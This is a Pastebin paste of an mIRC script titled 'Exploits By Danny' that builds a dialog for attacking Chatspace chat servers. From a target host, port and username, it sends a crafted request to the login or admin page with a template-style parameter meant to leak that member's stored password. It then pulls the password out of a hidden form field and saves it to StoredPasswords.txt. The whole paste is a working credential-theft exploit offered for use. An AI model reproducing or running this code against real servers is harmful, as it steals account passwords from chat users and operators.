Advertisement
Guest User

Untitled

a guest
Aug 7th, 2017
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.27 KB | None | 0 0
  1. alias csexploit1 { dialog -v,-md csexploit1 csexploit1 }
  2. dialog csexploit1 {
  3. title "Exploits By Danny"
  4. size -1 -1 187 192
  5. option dbu
  6. text "Type Of Exploit", 2, 53 1 65 8
  7. check "", 3, 29 12 7 7
  8. text "Default Page", 4, 39 12 55 8
  9. check "", 5, 104 12 7 7
  10. text "Admin Page", 6, 114 12 40 7
  11. text "Server's ip/link", 7, 56 110 65 7
  12. text "Port", 8, 135 110 25 7
  13. edit "server.chat.com", 9, 34 120 95 10
  14. edit "8000", 10, 134 120 25 10
  15. text "Username to Exploit", 11, 46 136 51 7
  16. edit "", 12, 34 147 86 10
  17. button "Execute Exploit", 13, 128 147 54 10
  18. button "Saved Passwords", 15, 55 168 60 10
  19. edit "", 14, 19 24 145 79, autohs autovs multi return hsbar vsbar
  20. }
  21. on *:dialog:csexploit1:init:*:{
  22. dll Dll/mdx.dll SetMircVersion $version
  23. dll Dll/mdx.dll MarkDialog $dname
  24. did -c $dname 3 | set %typeofexploit login.htm
  25. }
  26. on *:dialog:csexploit1:sclick:3:{
  27. set %typeofexploit login.htm
  28. did -u $dname 5
  29. }
  30. on *:dialog:csexploit1:sclick:5:{
  31. set %typeofexploit admin/cfg.htm
  32. did -u $dname 3
  33. }
  34. on *:dialog:csexploit1:sclick:13:{
  35. set %expnick $did(12,seltext)
  36. set %expnickcs12 $did(9,seltext)
  37. set %expnickcs123 $did(10,seltext)
  38. exploit
  39. }
  40. on *:dialog:csexploit1:sclick:15:{
  41. set %fileexp StoredPasswords.txt
  42. did -ra $dname 14 if (%fileexp) {
  43. .loadbuf 0 -o $dname 14 " $+ %fileexp $+ " set %fileexpx mIRC notepad :: $nopath(" $+ %fileexp $+ ") dialog -t $dname %fileexpx }
  44. }
  45. alias exploit { sockopen exploit %expnickcs12 %expnickcs123 }
  46. on *:sockopen:exploit:{
  47. sockwrite -n $sockname GET / $+ %typeofexploit $+ ?target= $+ %expnick $+ &nick= $+ %expnick $+ &pass=%dbget:Members.%target%.pass%
  48. }
  49. on *:SOCKREAD:exploit: {
  50. sockread %temp
  51. if (<input type="hidden" name="resumeopts" value="target= isin %temp) {
  52. set %expnick1 $gettok(%temp,7,61)
  53. did -a csexploit1 14 $crlf Site: %expnickcs12 $+ : $+ %expnickcs123 $crlf
  54. did -a csexploit1 14 User: %expnick $crlf
  55. if (%expnick1 == ">) { did -a csexploit1 14 Pass: Not Registered }
  56. else { did -a csexploit1 14 Pass: $remove(%expnick1,",>) $crlf
  57. write StoredPasswords.txt Site: %expnickcs12 $+ : $+ %expnickcs123 $crlf UserName: %expnick $crlf PassWord: $remove(%expnick1,",>) $crlf
  58. }
  59. }
  60. }
  61. menu channel,menubar { [-[-Chatspace Exploit-]-]:/csexploit1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement